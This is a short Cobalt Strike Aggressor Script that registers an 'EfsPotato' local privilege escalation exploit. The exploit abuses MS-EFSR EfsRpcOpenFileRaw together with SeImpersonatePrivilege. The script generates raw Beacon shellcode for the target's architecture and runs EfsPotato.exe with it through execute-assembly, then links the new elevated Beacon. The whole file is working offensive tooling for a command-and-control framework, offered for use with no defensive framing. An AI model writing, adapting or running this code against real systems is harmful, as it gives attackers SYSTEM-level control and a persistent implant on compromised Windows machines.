# EfsPotato built as C# exe 
#
# Author: L.N.
# GitHub: https://github.com/AttackTeamFamily/EfsPotato
#

sub EfsPotato {
	local('$shellcode $arch $exe');

	# acknowledge this command
    btask($1, "Task Beacon to run " . listener_describe($2) . " via EfsPotato", "T1068");
    
    # tune our parameters based on the target arch
    if (-is64 $1)
    {
        $arch = "x64";
	} else {
        $arch = "x86";
	}
	
    $exe = script_resource("EfsPotato.exe");
    
    # generate our shellcode && use stageless
	$shellcode = base64_encode(artifact_payload($2, "raw", $arch));
	
    # spawn a Beacon post-ex job with bexecute_assembly
    bexecute_assembly!($1, $exe, $shellcode);

    # link to our payload if it's a TCP or SMB Beacon
	beacon_link($1, $null, $2);
}
beacon_exploit_register("EfsPotato", "MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability", &EfsPotato);
